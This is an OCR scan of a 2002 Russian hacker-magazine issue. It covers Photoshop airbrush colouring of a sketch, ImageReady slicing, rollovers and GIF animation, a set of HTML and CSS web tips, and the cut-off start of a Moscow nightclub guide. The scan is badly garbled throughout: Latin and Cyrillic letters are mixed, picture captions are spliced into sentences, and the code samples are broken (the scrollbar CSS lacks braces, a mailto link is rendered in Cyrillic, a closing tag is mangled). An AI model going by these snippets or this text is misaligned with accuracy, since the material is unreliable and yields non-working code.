Когда карандашный скетч готов полностью, пора переносить его 
на компьютер. Нарисуй пипла в какой-нибудь более интересной 
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позе, чем в примере, который я приводил выше, и загоняй на 
HDD aka сканируй. Обычно художники при сканировании раз- 
решения не жалеют - выставляют столько, сколько сможет вы- 
держать компьютер, но это оттого, что львиную долю работы 
они выполняют на бумаге, и компу остаются только косметичес- 
кие доработки. В нашем случае все будет несколько иначе - важ- 
но только как можно более четко очертить контур будущего ше- 
девра и выделить его наиболее характерные линии, а увеличить 
разрешение в случае надобности можно будет уже программно. 
Итак, фотошоп загружен, битмап тоже. Для этой статьи я выта- 
ЩИЛ ИЗ СТОПКИ СВОИХ СТа- 
рых скетчей накачанного 
парня с пистолем и боль- 
шим... мечом в руке. Я не 
претендую на лавры Бо- 
риса Валеджо, и в рисун- 
ке есть ряд огрехов, одна- 
ко надеюсь, что это не 
послужит поводом для то- 
го, чтобы ты отшвырнул 
журнал в оскорбленных чувствах эстета-самоучки. Первая опера- 
ция после оцифровки графита - нахождение оптимальной яркос- 
ти и контраста, которыми лучше заниматься вручную, передвигая 
ползунки (Image->Adjust->Brightness/Contrast). Затем следует 
поудалять всякую мелкую шнягу, точки, лишние следы от каран- 
даша, которые неизменно возникают на бумаге (а сканер, гад, ха- 
вает все подряд :)). (Рис. 3) 


КРЕАТИФФ 

Вот теперь-то и начинается креатифф. Для начала выделим 
участки рисунка, представляющие разные типы поверхности - 
кожи, материи, металла. Это пригодится для того, чтобы при 
работе не выскакивать за их границы, например, чтобы тень 
не повисала в воздухе. Простейшим выделителем является 
Polygonal Lasso, однако для наибольшей точности пользуются 
инструментом Pen (о его преимуществах знают те, кто зна- 
ком с векторной графикой). Выделив пеном необходимый 
контур, его надо преобразовать в выделение: щелкнув правой 
кнопкой крысы, в появившемся меню выбери команду Make 
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Selection. Выделенные области следу- 
ет сохранять для дальнейшей работы - 
также щелкай правой кнопкой и вы- 
бирай Save Selection. 

Далее главными инструментами для 
нас станут аэрограф и палец (Smudge). 
Во-первых, определимся, откуда будет 
падать свет, чтобы в соответствии с 
этим рисовать тени. Это непростой во- 
прос, и, возможно, с первого раза реа- 
листично закрасить не получится. Но 
попробовать стоит. Грузим выделен- 
ную область с торсом (Select->Load 


Selection), берем аэрограф и устанав- 
ливаем для него такие настройки: раз- 
мер - покрупнее, примерно с толщину 
руки, Mode - Normal, Pressure - не- 
большой, 15-30 процентов. Внима- 
тельно и нежно пройдись 

черным цветом по тем мес- ©) 

там, которые должны нахо- 
диться в тени. Выступаю- 
щие части тела :), такие как 
бицепсы, грудные 

мышцы, квадрати- т тж 
ки пресса, следу- 


в его градиентно- 
CTH, так что HM 
хорошо реализо- 


Далее по плану у нас работа пальчиком 
aka Smudge. Палец идеально подходит 
для придания телу еще более гладких и 
всамделишных форм. Ошибки, кото- 
рые были допущены на этапе рисова- 
ния карандашом и аэрографом, удоб- 
нее всего исправлять этим инструмен- 
том. Здесь мы 

сглаживаем все 

резкие края и ли- 

нии. Размер кисти 

берем примерно 

такой же, каки в 

аэрографе, однако для разных деталей 
его можно варьировать, как и степень 


Шкелет. 

Шкелет в теле. 

До и после очистки. 
Чиркалка. 

Уже неплохо :)... 


Все ближе к цели. 
Панелька Hue. 
Наконец-то конец начала 


Pressure. Скажем, с носом работать 
можно лишь мелкой кисточкой, иначе 
расплющишь. Еще одна архизабавная 
штучка, которую можно сделать паль- 
цем, - рельефные вены на руках. Обра- 
ти внимание на правый бицепс: инстру- 
ментом pencil вдоль него рисуется тон- 
кая белая линия, которая затем легкими 
подергиваниями туда-сюда размазыва- 
ется до нужных кондиций. (Рис. 6) 
Что x, будем считать, что тело в серых 
тонах готово. Остается что? - правиль- 
но, придать ему реальный цвет. К счас- 


Палец идеально поднодит для придания телу еще Более гладкин и всам- 
делишных форм. Ошивки, которые выли допущены на этапе рисования ка- 
рандашом и азрографом, удобнее всего исправлять этим инструментом. 


тью, это самая легкая часть работы, фо- 
тошопа сделает все за тебя. Итак, снова 
грузим выделение с торсом и вызываем 
окно Хью и Сатурирования: Image- 
>Adjust->Hue/Saturation. Если не полу- 
чается, то, скорее всего, на- 
до просто перевести цвето- 
вую модель изображения в 
ВОВ. В окне Hue/Saturation 
ставим галочку в поле 
Colorize и начина- 
ем двигать ползун- 
Le} xa. Я выбрал сле- 


Е 


ет, наоборот, ос- св" | дующие значения: 
ветлять. Главное ante Е Hue - 27, 
бы ыы : 
преимущество аэ- , Saturation - 52, 
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немного поэкспе- 


Ну вот, кажется, более или менее мы 
справились с задачей, которая была по- 
ставлена. Несколько небольших трени- 
ровок - и все получится стократ лучше. 
Конечно, многое в картинке еще пред- 
стоит доделать, ведь мы рассмотрели 
только имитацию кожной поверхности 
чела. Я надеюсь, 
позже мы вновь 
вернемся к этой 
теме и доведем 
картинку до ума - 
обработаем шта- 
ны, сапоги, меч, шлем, пустим дымок 
из пистолета и прибавим фон, чтобы 
ее смело можно было называть компо- 
зицией. А если ты действительно заин- 
тересовался и тебе не терпится творить 
и креативить, то смело мыль мне и за- 
глядывай на сайт: сделаем из тебя Ре- 
пина, художник Феликс ;). 
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Инстрчмент 


оля WEB- кресзтчивсо 


И те, и другие для создания WEB используют PhotoShop, то 
есть почти всю графику обрабатывают или дорисовывак 
оптимизируют в фотожопе. Ну а потом \/ЕВ-любители 
склеивают это все BO FrontPage, a WEB-rypy прописывают все 
ручками или в профессиональном НТМГ-редакторе. И зачем, 
спрашивается, создавать себе лишний гимор, если фотожоп сам 
умеет кодить в HTML? 


ЧТО ТАКОЕ HTML? 

HyperText Markup Language - язык гипертекстовой разметки. 
На этом языке пишут странички для Инета. Язык помогает 
расположить на странице картинки, текст, таблицы и 
организовать ссылки на другие странички. 


ЧТО ТАКОЕ JAVASCRIPT? 

HTML - статичный язык. То есть с его помощью ты задаешь 
статично, где какая картинка, где какой текст, какая ссылка. 
Но если тебе нужно, чтобы страничка реагировала на 
движение мышки, показывала разные спецэффекты, то тебе 
нужны сценарии поведения (скрипты). JavaScript - одна из 
технологий, которая помогает оживить страничку. 


IMAGEREADY 

Tak зовут специальный интерфейс Photoshop, который умеет 
работать с графикой почти как Фотожоп и умеет 
конвертировать графику в формат WEB. To есть эта софтина 
умеет увязать твои картинки с помощью HTML и JavaScript так, 
чтобы получилась сносная страничка. Эта прога устанавливается 
вместе с Фотожопом. Если у тебя уже стоит PhotoShop, она 
тоже имеется, просто ты не обращал на нее внимания. 


КРЕАТИВНАЯ НАРЕЗКА 

Допустим, ты уже придумал и нарисовал свою новую страничку 
в PhotoShop. То есть ты продумал: где будет размещаться текст, 
где будут размещаться картинки, где будут кнопочки. Теперь эту 


Эта софтина умеет увязать твои картинки с помощью 
HTML и JavaScript tak, чтоы получилась сносная 
страничка. Прога устанавливается вместе с Чотожопом. 
Так что если у тевя уже стоит PhotoShop, она тоже 
имеется, просто ты не овращал на нее внимания. 


большую картинку нужно порезать на маленькие картиночки. 
Эти маленькие картиночки нужно засунуть в табличку НТМГ. 
ер смог разобрать, где 
картиночек 


Весь этот гимор для того, чтобы бра} 
какая картиночка должна быть, чтобы из малень 
собрать большую. К каждой маленькой картинке можно 

прицепить ссылку на другую страничку, так получится кнопка. 


КАК РЕЗАТЬ? 

Для шинковки эскиза сайта в табличку ручным способом или в 
НТМЕ-редакторах обычно нужно сначала создать табличку, а 
потом туда запихивать изображения. Этот процесс отнимает 
много времени и давит креатифф. В ImageReady все наоборот: 
ты рисуешь табличку поверх картинки. Дальше софтина сама 
режет твою картинку на мелкие части, создает таблицу и 
запихивает туда маленькие картинки. 


1. Фотка, которую будем мучить! 
2. Разбиваем на ячейки 
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Шинковочный инструмент называется Slice и похож на ножик 
или скальпель. И снова приятность! У таблички в IR 
(ImageReady) нет ничего общего с M$ Exel. То есть тебе не 
придется париться с колонками и строками. Ты просто рисуешь 
скальпелем прямоугольники (ячейки), а софтина сама думает, к 
каким столбцам или строкам их приписать. Даже в НТМГ- 
редакторах тебе приходится париться, как бы склеить ячейки так, 
чтобы получилась нужная таблица. Тут достаточно нарисовать 
одну ячейку, а софтина сама добавит все остальные ячейки, 
необходимые, чтобы получилась полноценная НТМГ-таблица. 
После того как ты раскроил картинку на области скальпелем, 
можно поправить размеры каждой области (ячейки). Для этого 


Ты можешь менять картинку в лювом месте экрана, 
когда курсор попадает в заданную оБласть. То есть 
можно заставить человечка дрыгать ногами, шевелить 
пальцами или улывБаться, когда наводишь на него 


нужно взять специальный скальпель для выделения, выбрать им курсор. В IR для этого доступны все стандартные 
нужную область и таскать ее за контурные точки. Можно фотожопоБские инструменты. 

удалить лишние области или добавить новые. Если ты ошибся, то 

имеется полноценный многоступенчатый History, как в 

PhotoShop. То есть ты сможешь вернуться на несколько шагов 


назад. 


ЧТО ЕЩЕ МОЖНО ДЕЛАТЬ С ЯЧЕЙКАМИ? 
Каждой ячейке можно дать имя и повесить на ячейку интернет- 
ссылку. Теперь, если на ячейку кликнуть, попадешь на нужную 
страничку. Если ты выбрал ячейку, то информация о ней 
отображается в специальном окошке. Там же ты и задаешь эти 
параметры. Есть имя маленькой картинки, которую IR отрежет 
от твоего большого эскиза. У каждой ячейки есть свой номер. 
Имя каждой маленькой картинки получается из названия эскиза 
и номера картинки, хотя ты можешь задать другое имя. Если ты 
решил, что в этой ячейке у тебя не будет картинки, то мо 
закинуть туда текст и выбрать цвет фона. 
HE ЗАБЫВАЙ, ЧТО ТЫ В ФОТОЖОПЕ! a 
Если тебе мешает разметка или другие НТМГ-фичи, то их можно 
легко отключить специальной кнопкой. Теперь ты можешь легко 
доработать эскиз стандартными фотошоповскими инструментами и 
фильтрами. Включаешь разметку на ячейки назад и снова ТВОЙ 
эскиз нарезан на мелкие картинки. Так можно хоть каждый день 
чуть-чуть менять дизайн твоего сайта и тратить на это ровно 5 
минут. у 
СЛОИ 
Естественно, в каждой ячейке твоей разметки может быть 
несколько стандартных фотошоповских слоев. А ты можешь их 
включать и выключать. Получается, что так в одном файле 
можно хранить макет целого WEB-pecypca. Решил сменить 
цветовую гамму сразу на всех страничках? Легко! Просто включи 
сразу все слои и примени к ним инструмент RGB или Variation. | 
КАРТЫ 
Допустим, у тебя сложная картинка, ее на табличку не f 
разобъешь. А хочется, чтобы мышка очень точно попадала в 
область. Представь, что у тебя фотография или рисунок 
человека и хочется, чтобы можно было кликнуть на ручку, на 
ножку, на брюшко и на голову. Для того и придумали карты. 
Обычно нужно сначала создать табличку, а потом туда 
запинивать изображения. Этот процесс отнимает много 
времени и давит креатифф. В ImageReady все наоворот: 
ты рисуешь табличку поверн картинки, а софтина сама 
режет твою картинку на мелкие части и создает таблицу. 
Называется это Image Map. Ты просто выделяешь любую 
~ И 


область на картинке и делаешь на нее ссылку. Теперь, Когда ты 


нажмешь на нужную часть тела, то попадешь на привязанную к 
ней страничку. Кстати, если пользоваться картами, то резать 
картинку не надо. 

КАК РАЗМЕТИТЬ КАРТЫ В IR? 

В ImageReady для нанесения на картинку Image Мар имеется 


специальный инструмент в виде пальчика вверх. Их несколько 
типов: для круговых выделений, для прямоугольных, сложные 
объекты можно выделять ломанной. После того как ты 
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нарисовал область карты, можно присвоить ей ссылку. Еще 
области можно дать имя и сделать подпись. Все эти фичи 
настраиваются в специальном окошке. 


ОЖИВИ СВОЙ КРЕАТИФФ! 

Ты, наверное, видел на многих сайтах такой прикольный эффект, 
когда наводишь на кнопочку курсор, она либо загорается, либо 
проваливается. Такие штуки делают обычно с помощью 
JavaScript или Flash. ImageReady умеет это делать на JavaScript. 
Фокус тут в том, что скрипт отслеживает положение курсора 
и меняет картинки. 

Ты можешь менять картинку в любом месте экрана, когда 
курсор попадает в заданную область. То есть можно заставить 
человечка дрыгать ногами, шевелить пальцами или улыбаться, 
когда наводишь на него курсор. В IR доступны все стандартные 
фотожоповские инструменты. Например, чтобы заставить 
перца улыбаться, нужно создать новый слой и на нем 
растянуть человечку лыбу пальцем. Если ты хочешь подсветить 
кнопку, то на новом слое нужно добавить яркости и красного 
цвета. 


ЧТО И КАК ОЖИВЛЯТЬ? 

В ImageReady можно сделать чувствительными областями Image 
Мар или Slice. To есть курсор умеет чувствовать ячейка или 
область на карте. Дальше нужно заготовить слой, на котором 
будут изменения. Таких слоев может быть несколько: первый для 
спокойного состояния, второй - когда навели курсор, третий - 
когда убрали курсор, четвертый - когда кликнули, пятый - когда 
попытались взять и перетащить. Словом, можно накреативить 
живой интерфейс не хуже, чем на флэшке. И для этого не надо 
быть крутым программистом JavaScript. IR напишет скрипты за 
тебя, твое дело - чистый графический креатив в фотожопе. 


ROLLOVER 

Есть такое специальное окошко, в котором ты задаешь: какие 
слои соответствуют каким состояниям курсора и в каких 
областях. То есть ты должен выбрать область на карте или 
ячейку. Потом для этой области или ячейки нужно создать 
несколько состояний: наведена, нажата и так далее. Чтобы все 
работало, для каждого состояния нужно выбрать слои, которые 
ты приготовил. Например, на одном слое у тебя обычная рожа, а 
на другом улыбающаяся. Чтобы чел улыбался при нажатии на 
рожу, нужно нарисовать на его роже область карты, для этой 
области создать состояния: «нормальное» и «нажатое». Для 
состояния «нажатое» нужно выбрать видимый слой с 
улыбающейся рожей, а для состояния «нормальное» нужно 
выбрать видимый слой с обычной рожей. Чтобы протестить наш 


креатифф, надо нажать на кнопку play, после этого можно 
кликать на рожу, она будет улыбаться. Функции можно 
протестить в твоей бродилке. Для этого нужно нажать на кнопку 
«тестить в Ишаке». Такая кнопка со значком БПтернет 
Гэгсплорера. 


И СНОВА ПОМНИ, ЧТО ТЫ В ПОЛНОЙ 
ФОТОЖОПЕ! 

Ничто не ограничивает твой креатифф! Кнопки при нажатии 
могут улетать, менять цвет, кусаться, растворяться, вспыхивать 
или плавиться. Используй для этого стандартные инструменты 
PhotoShop. Когда ты пытаешься замутить такие вещи в HTML 
редакторе, ты все равно используешь Фотошоп. А тут ты 
экономишь время, поскольку не нужно постоянно 
экспортировать картинки в другие программулины. 


АНИМИРОВАННЫЙ GIF 

Многие начнут истошно орать, что анимированный GIF - это 
прошлый век. Всем подавай Flash. Не ори! Просто загляни в 
глобальную сеть и ты увидишь, что анимированный GIF там 
используется так же часто, как Flash, а может и чаще. GIF- 
анимашка это набор растровых картинок, то есть каждая картинка 
состоит из точек. A Flash - это векторные картинки, то есть 
каждая картинка состоит из линий. Так что векторный рисунок 
удобней загонять во Flash, а растровый - в GIF. PhotoShop, как 
известно, заточен под растровые картинки. Еще бы! Ведь 
фотография - это самый настоящий растр. 


КАК АНИМИРОВАТЬ GIF? 

В Имаджрэди встроен аниматор гифок. Он простенький, 
поэтому научиться делать маленькие мультики сможет рядовой 
любитель Фотошопа. Принцип простой: у тебя есть несколько 
обычных фотошопофских слоев, на которых происходят 
изменения. В специальном окошке у тебя снова несколько 
состояний. Каждое состояние - это кадр будущего 
мультфильма. Если ты хочешь запихнуть в ГИФ видео, то тебе 
придется для каждого кадра сделать свой слой. А потом 
каждому состоянию мультфильма привязать этот слой. 
Допустим, у нас есть мультик шагающего человека, и мы 
каждую стадию шагов записываем в фотошоповский слой. 
После этого мы открываем окошко Animation и создаем там 
нужное количество состояний. Осталось для каждого 
состояния сделать видимым нужный слой. После того как мы 
нажмем play, Имаджреди начнет перебирать слои, и человечек 
пойдет. Это самый примитивный способ создавать мультики. 
На самом деле ImageReady умеет растянуть на несколько кадров 
действие любого фотошоповского инструмента. Например, мы 
заставили человека на фотографии улыбаться. Для этого мы 
создали новый слой и растянули, размазали уголки его губ 
пальцем. Получилась нехилая лыбла. Теперь на одном слое у 
нас нормальная рожа, а на другом улыбающаяся. 


august/08/2002 


Креатив 


Теперь мы создаем в окошке «Анимация» два состояния. В 
первом состоянии мы делаем видимым слой с нормальной 
рожей, во втором состоянии мы делаем видимым слой с 
улыбающейся рожей. Если теперь нажать play, то чел просто 
быстро улыбнется. А Имаджреди просто перескочит с одного 
слоя на другой. Но нам с тобой этого мало! Мы можем 
добавить между этими двумя состояниями дополнительные. 
Для этого надо нажать на специальную кнопку добавления 
состояний. Добавили, к примеру, еще пять состояний, и 
Имаджреди автоматически в этих промежуточных состояниях 
отобразит стадии рисования улыбки. То есть теперь наша 
рожа будет улыбаться постепенно. В первом состоянии уголки 
рта ели замажутся, во втором они скривятся, в третьем лыба 
начнет расползаться и так далее. 


ЭФФЕКТ С ДВИЖЕНИЕМ 

Вставкой дополнительных кадров-состояний хорошо 
пользоваться, когда у тебя куда-то чего-то летит. Допустим, 
ты хочешь, чтобы на твой баннер вылетали рекламные 
лозунги, окорочка, апельсины или просто ручные гранаты. 
Для этого тебе нужно два состояния: в первом летающие 
объекты будут на исходной позиции, а во втором ты эти 
объекты подвинешь. Теперь достаточно добавить 
промежуточные состояния, и Имаджреди сама рассчитает 
программу полета твоих злобных объектов. 


ЭФФЕКТ С ИСЧЕЗНОВЕНИЕМ 

Я рассказывал тебе о видимых и невидимых слоях. То есть я 
думал, что ты знаешь, как устроены слои в Фотожопе. На 
всякий случай напомню об этом. Каждый слой PhotoShop - 
независимая картинка. Если такие картинки лежат поверх друг 
друга, то видно только верхнюю. Чтобы увидеть нижние 
картинки, нужно сделать верхнюю прозрачной. То есть 
прозрачность каждого слоя ты можешь регулировать в 
настройках слоя. Еще ты можешь отметить, какие слои видно, 
а какие нет. Никто не мешает тебе устроить анимационный 
эффект, в котором один слой будет исчезать и появляться 
другой. 

Например, ты хочешь, чтобы рожа одного твоего друга 
плавно трансформировалась в рожу другого твоего друга. Для 
этого ты на один слой вешаешь рожу одного друга, а на 
другой слой - рожу другого. Допустим, одного зовут Петя, а 
другого Юля. Чтобы превратить Петю в Юлю, нужно найти 
фотки в похожем ракурсе, при похожем освещении, на 
похожем фоне. Ну и, естественно, фотки должны быть 
одного размера. Фон, размер и освещение ты легко 
подкрутишь в Фотошопе, главное, чтобы ракурс совпадал. В 
итоге Петя на верхнем слое, а Юля на нижнем. Юлю не 
видно за Петей. Чтобы Петя медленно перерос в Юлю, мы 
постепенно делаем слой с Петей прозрачным, и у нас 
проступает Юля. После того как Петя полностью исчезнет, 
будет видно только Юлю. 


ЖМЕМ КАРТИНКИ 

Допустим, ты уже много всего накреативил, и макет твоей 
будущей странички прикольный, красочный и умеет двигаться. 
Пора подумать о том, как ты все это будешь засовывать в HTML. 
Для того чтобы страничка грузилась у всех без проблем, она 
должна весить не больше 40 килобайт вместе с картинками. Для 
того чтобы картинки грузились быстро, их нужно 
оптимизировать. Оптимизировать придется JPG, в котором 
хранятся фотографии, и GIP, в котором хранятся рисунки и 
мультфильмы. 


ОПТИМИЗИРУЕМ JPG 

Джиег жмет картинку за счет снижения се качества: появятся 
всякие разводы, перхоть, рябь. Поэтому, когда ты жмешь 
фотографии в ImageReady, у тебя открывается окошко с четырьмя 
дублями твоей картинки. В одном дубле оригинал, а в остальных 
трех дублях ты можешь попробовать разные алгоритмы сжатия и 
разную силу сжатия. Твоя задача выбрать наименее поганый 
вариант с наименьшим весом. Во время сжатия твои картинки 
станут сильно хуже, поэтому иногда можно их спасти поднятием 
яркости или насыщенности цветов. 


ОПТИМИЗИРУЕМ GIF 

Статичную ГИФку оптимизировать одно удовольствие. Прелесть в 
том, что ты можешь удалить все лишние цвета, которые не 
используются или используются мало. За счет этого можно пожать 
ГИФок хоть в 10 раз без потери качества, все зависит от того, что 
на нем нарисовано. Бывает, оставишь 8 цветов, и картинка 
погрустнела, но не беда! Можно легко развеселить оставшиеся 
цвета с помощью фотошоповской функции Variations, там тебе на 
выбор предлагаются картинки с измененными цветами и яркостью. 
С ГИФ мультиками дела обстоят сложнее. Ведь каждый 
уникальный кадр серьезно добавляет весу твоему креативу. Поэтому 
нужно продумать все так, чтобы кадров было как можно меньше. 
Очень хорошо, если используются простые операции - типа 
движения или исчезновения. Они жрут немного ресурсов. Нужно 
все продумать так, чтобы фон мультика не менялся. A если ты 
хочешь сделать в мультфильме задержки, то не надо добавлять новых 
кадров. Время каждого кадра ты можешь задать в окошке Animation. 


ПОЛУЧАЕМ ГОТОВУЮ СТРАНИЧКУ 

Проект твоей странички со всеми настройками хранится в 
стандартном фотошоповском файле PSD со всеми слоями. 
Когда ты сохраняешь его, то все твои наработки засейвятся 
в одном огроменном файле. Если ты решил перевести 
макет в готовую страничку для Интернета, то нужно 
сохранять ее в формате НТМГ. При этом 
ImageReady разрежет твой макет на маленькие 
картинки, оптимизирует их, даст им 
уникальные номера и сложит в отдельную 
директорию. В НТМГ-файле софтина 
создаст таблички и скрипты, свяжет 
ссылки с нужными картинками из 
этой директории. В результате, 
когда ты загрузишь ХТМЛ-ьку в 
бродилке, то увидишь макет своей | 
странички в рабочем виде. Если 
тебя что-то не устроит или если ть 
крутой HTML и JavaScript кодер, 
то ты всегда можешь загрузить эту 
ХТМЛ-ку в редактор либо 
поправить нужные вещи руками. 


ImageReady делает за тебя 
черновую работу: режет картинки, 
рассчитывает таблички, ставит 
ссылки, хранит все это. Избавляет 
от переходов из одного редактора в 
другой. A у тебя остается больше 
времени на креатифф! = 


Креатив 


TIPS OF WEB 


Vadias (painter@gameland.ru, 


Главная страница сайта - это TO же 
самое, что обложка книги либо 
1 первые кадры фильма. От них 
зависит весьма многое в плане 
первых впечатлений, поэтому 
делать мейнпэйдж следует такой, 
чтобы, с одной стороны, юзеру было понятно, какого рода 
этот сайт и что ему тут светит (то есть вывесить на ней 
“содержание” сайта), и, с другой стороны, она должна 
радовать глаз и не отпугивать. Помни, твоя первоначальная 
цель - заинтриговать зрителя. Вот так-то, старый интриган ;}. 


Даже для раскрутки любительских 
проектов нужны некоторые 
= исследования. Но ничего - 
проводить их несложно: найди 
наиболее успешный и популярный 
сайт своих “конкурентов” (сайтов 
с аналогичной тематикой) и проанализируй, почему именно 
туда народ валит толпой. Стоит ли подсказывать тебе, что 
нужно делать дальше :)? Но в любом случае - не воровать 
графику и тексты, однако хорошую идею можно 
своеобразно адаптировать к своему ресурсу ;). 


Наверняка ты случайно нарывался 
на сайты, которые, предоставляя 
3 информацию, интересующую тебя 
меньше всего на свете, тем не 
менее заставляли тебя 
возвращаться туда снова и снова, 
а то и приобретать новые интересы. Вернись на эти сайты 
еще разок и как следует подумай над тем, что именно 
привлекло твое внимание, и возьми соответствующий прием 
себе на заметку. 


Таблицы в настоящее время - 
самый популярный метод 
& построения веб-страницы, 
поскольку они более или менее 
дают гарантию того, что пага 
будет одинаково выглядеть 
и в старом добром ишаке, и в Мозилле, и в Опере. Однако 
надо быть осторожным с их размещением, проверять 
и устанавливать все тэги, даже вспомогательные, 
прописывать ширину и высоту ячеек, потому как для 


ими. Егеевапа. ${г.ги) 


некоторых браузеров вспомогательные тэги являются 
обязательными. Это скажется и на эстетике загрузки 
страницы: размеры с самого начала будут появляться 
правильно (пример обратного ты наверняка видел: 
загружается текст, потом картинка, и текст неожиданно 
прыгает вверх, вниз или в стороны). 


Если ты сделал дизайн паги 
в графическом редакторе и не 
5 знаешь, как запихнуть все это 

в хгмл-таблицу, TO создай 

в редакторе новый слой 

и прочерти в нем вертикальные 
и горизонтальные линии, разделяющие ключевые элементы | 
страницы. Получится графическая таблица, и по ней уже 
гораздо легче провести хтмл-верстку. 


Вложенности таблиц по 
возможности следует избегать, 
6 разделяя большую таблу на 
маленькие. Если без 
вложенности не обойтись, 
проследи, чтоб вложенных таблиц было не более трех. 


Есть хитрый метод предзагрузки 
пикчур большого размера, 
и реализуется он средствами 
7 HTML без JavaScript. Допустим, 
ты уверен, что с главной страницы 
юзер скорее всего пойдет на 
страницу с фотографией. Тогда на 
главную страницу в укромное место вставляешь эту фотку 
и указываешь ей размер 1X1 пиксель. Чтобы она грузилась 
уже после остального страничного материала, юзай 
параметр LOWSRC. В общем, конструкция такая: <img 
width=”1” height=”1” lowsrc=”fotka.jpg”>. Изображение 
остается в кэш-памяти и при загрузке страницы берется 
оттуда. 


С помощью CSS можно 
извратиться над курсором юзера, 

[2] елозящего мышкой по твоей 
странице. В нужный тэг 
вписывается атрибут 


Креатив 


“cursor:value”. Если хочешь, чтобы виа 
на территории всей страницы 
курсор тусил в виде песочных 
часов, вписывай в тэг <BODY> 
курсор “wait” вот таким образом: 
<body style=”cursor:wait”>. Чтобы 
при наведении Ha ссылку курсор 
превращался в стрелку с вопросом, 
делай так: <а 
href="http://www.xakep.ru” 
style=”cursor:help”>” Kcaxen”</a>. 
Полный список и вид курсоров ты 
видишь на прилагаемом скрине. 


Го а] 


п > 


| 


Правда, здесь есть и грустная Доступные виды курсоров 
новость: эту типсу 


поддерживает Internet Explorer, но другие браузеры ее 
бойкотируют :(. 


Headers и footers. Header - это 
шапка сайта, которую имеют 
многие сетевые ресурсы. В нее, 
как правило, вынесены меню, 
форма для поиска, почтовая 
ссылка и другие мелочи. Если 
какая-либо страница сайта очень длинная (в несколько 
экранов), то скроллить на самый верх, чтобы 
воспользоваться поиском, отправить мыло или перейти 

в другой раздел, для посетителя будет довольно 
утомительным делом. Во избежание этой проблемы в самом 
низу страницы создаются footer’b - облегченная версия 
шапки, с более простой графикой и копирующая из нее 
только важные кнопки. На худой конец, можно поставить 
кнопку “наверх”, используя внутреннюю ссылку (смотри 
типсы предыдущего номера). 
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Навороченные полосы прокрутки. 
Не всех удовлетворяет 
стандартный скроллбар, 
предоставляемый мелкософтом; 
местами он даже может 
подпортить дизайн. К нашей 
великой радости, мелкомягкие сжалились и дали 
возможность контролировать 
цвета всех составляющих 
скроллбара с помощью CSS. 
Вставь следующую 
конструкцию между тэгами 
<HEAD></HEADs, выстави 
значения цветов 

и наслаждайся произведенным 
эффектом. Конструкция: 
<STYLE 

type="text/css” ><!— 

BODY 

scrollbar-base-color: color; 
scrollbar-track-color: color; 
scrollbar-face-color: color; 
scrollbar-highlight-color: color; 
scrollbar-3dlight-color: color; 
scrollbar-darkshadow-color: 
color; 

scrollbar-shadow-color: color; 
scrollbar-arrow-color: color; 
</STYLE> 

Всего составляющих скроллбара семь штук плюс base - 
устанавливает цвет для всего скроллбара. Чтобы знать, цвет 
чего ты меняешь, прилагается скрин. Значение цвета 


Jdlight —— 
highlight 
face 
shadow 


track 


РА 


darkshadow | 


Элементы скроллбара 


вводится либо в формате RGB (тремя числами), либо 
словом (black, green, white и так далее), 
или шестнадцатеричным значением. 

Почтовые ссылки на паге можно 


4 немного усовершенствовать. 

11 > Например, если ты поддерживаешь 
сайт с кем-то на пару, и посетитель 
решил написать вам мессагу, есть 
возможность сделать так, чтобы 

письмо отправлялось сразу обоим. хтмл-код такой ссылки 

будет выглядеть так: 

<a БгеЕ=”паШо:уазуа@хаКер.га?сс=регуа@хаКер.га”>Написать 

Васе и Пете</а>. Можно также автоматически вставлять 

тему письма (subject). Для этого ссылку надо оформить так: 

<а 
href=mailto:suslik@mail.ru?subject=”[Tacbmo%20c%20carta”> 

Письмо суслику</а>. Не забудь вставить “%20” между 

словами, иначе в поле сабжа будет только первое слово 

(обработка текста идет до первого пробела). 

Ни один уважающий себя 


4 мажорный сайт He обходится без 
1 ee > функции поиска. Это и не 
7... удивительно - юзер всегда 
спешит, и поиск хорошо 
экономит его время. Но чтобы 
реализовать его, нужно шарить в перле или другом 
языке, используемом на твоем хост-сервере, а это, как я 
думаю, дано не каждому. Выход есть: существуют 
службы, предоставляющие услугу поиска, например, 
www.picosearch.com. 
Ты регишься у них, и Ha почту высылается кусок кода, 
который вставляется на твою страницу. К сожалению, 
страница с результатами поиска будет с их сервера, 
да и рядом с полем поиска будет торчать их логотип :(. 
Учи серверные языки, короче :)! 
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Splash-crpanuma. Такие страницы 
делают в качестве прелюдии 
13 > к сайту, дабы зритель проникся 


величественностью посещаемого 
ресурса. На нее помещают 
небольшую красивую картинку 
или анимацию. Некоторые пишут на ней “Enter”, 

и только после нажатия этой кнопки посетитель 
попадает на главную страницу. Однако есть метод лучше. 
Между тэгами <HEAD></HEAD> вставим такую 
метаинформацию: 

<META http-equiv=”refresh” content=”10; 
URL=index.html”> 

В параметре “content” задается количество секунд, через 
которое браузер автоматически перескочит на указанную 
далее в ОВГ страницу. 

Проблема этого метода состоит в том, что отсчет 
начинается с самого начала, и сплэш-страница может 
попросту не успеть загрузиться. 

Чтобы начать отсчет после загрузки паги, вместо 
метатега надо вписать в тэг <BODY> атрибут onload: 
onload=setTimeout(“location.href=’index.html’”,5000).B д 
анном случае время измеряется не в секундах, 

а в миллисекундах, поэтому используется такое большое 
число, как 5000. Удачных тебе сайтов! 
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Кэн ю шоу ми Be уэй TO Be ниарест Whisky bar? — просил меня, слегка 
толкнув, порядком набравшийся гость столицы и широко улыбнулся. 
Я махнул рукой в неопределенном направлении, мол, везде, куда ни 
плюнь, они родимые. ведь правда стоит сойти на любой 
центральной станции метро или пересечь третье или садовое кольцо 
на персональном автомобиле, и сразу возникает проблема выбора. 
По статистике, разнообразных заведений, готовых окружить тебя 
особой заботой и теплом (+ на два пальца апельсинового сока), в 
Москве порядка 500. Все они по-своему хороши. Свой клуб, для 
водопроводчйКов, свой — для электротехников. В одни клубы ходят 
разнообразные парапланеристы, парашютисты и парабаристы. В 
свой — покорители космических пространств и скоростей. Мы вот, 


втроем: я, Ноа и 


Город 


Большой и очень разный клуб. Не демократичный, как многие, - 
а просто совсем разный. Подростковый - и неподростковый. 
Можно встретить богемных клубников, а можно - франта из 
спального района. Идеологически они друг друга не любят, вот 
и тусуются каждый в своем углу; на большом танцполе - общая 
масса, на \1р-танцполе - избранные плюс Te, кто знает о его су- 
ществовании. В городе существует еще такой феномен - город- 
ская семья: не столько посетители, сколько обитатели. Все 
очень классные и настоящие - ничуть не похожи на обитателей 
городских джунглей :). 

e 
Mix 
Главный afterparty клуб в Москве. Ночью там делать практически 
нечего - с трудом наберется человек двадцать, однако где-то к 
утру ситуация кардинально меняется. Те, кому не спится, отправ- 
ляются Ha afterparty - специальное время, в которое отправлять- 
